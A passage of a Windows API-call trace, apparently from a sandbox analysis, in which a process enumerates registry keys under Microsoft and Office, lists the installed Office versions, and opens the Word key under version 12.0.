[0085.249] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Policies", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.249] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wow6432Node", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.249] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0xd, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Classes", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.249] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x34c) returned 0x0
[0085.249] RegCloseKey (hKey=0x3a0) returned 0x0
[0085.249] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.249] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Active Setup", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.249] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ActiveMovie", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.249] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Advanced INF Setup", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.249] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ASF Stream Descriptor File", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.250] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Assistance", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.250] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Command Processor", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.250] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="CTF", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.250] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Direct3D", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.250] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EventSystem", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.250] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Exchange", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.250] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fax", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.250] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Feeds", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.250] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="FTP", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.250] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0xd, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="GDIPlus", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.250] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0xe, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IAM", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.250] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0xf, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IME", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.250] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x10, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IMEJP", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.250] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x11, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Connection Wizard", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.250] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x12, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.251] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x13, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Mail and News", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.251] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x14, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Java VM", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.251] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x15, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.251] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x16, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MediaPlayer", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.251] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x17, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Microsoft Management Console", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.251] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x18, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MS Design Tools", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.251] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x19, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MSDAIPP", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.251] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1a, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MSF", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.251] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1b, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Multimedia", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.251] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1c, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Notepad", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.251] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1d, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Office", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.251] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1e, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OneDrive", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.251] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1f, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PeerNet", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.251] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x20, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Protected Storage System Provider", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.252] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x21, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="RAS AutoDial", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.252] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x22, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Remote Assistance", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.252] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x23, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Shared", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.252] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x24, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Shared Tools", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.252] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x25, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SideShow", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.252] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x26, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SkyDrive", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.252] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x27, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Speech", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.252] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x28, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SQMClient", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.252] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x29, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SystemCertificates", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.252] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2a, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VBA", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.252] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2b, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VisualStudio", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.252] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2c, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WAB", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.252] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2d, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="wfs", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.252] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2e, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.252] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2f, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Mail", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.253] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x30, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Media", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.253] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x31, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows NT", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.253] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x32, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Script", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.253] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x33, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Script Host", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.253] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x34, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Search", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.253] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x35, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Sidebar", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.253] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x36, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wisp", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.253] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x3a0) returned 0x0
[0085.253] RegCloseKey (hKey=0x34c) returned 0x0
[0085.253] RegQueryInfoKeyW (in: hKey=0x3a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.253] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="11.0", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.253] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="12.0", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.253] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="14.0", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.254] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="15.0", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.254] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="16.0", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.254] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8.0", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.254] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Common", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.254] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Excel", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.254] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OneNote", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.254] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Outlook", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.254] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PowerPoint", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.254] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.254] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x34c) returned 0x0
[0085.254] RegCloseKey (hKey=0x3a0) returned 0x0
[0085.254] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.254] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Excel", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.254] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PowerPoint", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.255] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.255] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x3a0) returned 0x0
[0085.255] RegCloseKey (hKey=0x34c) returned 0x0
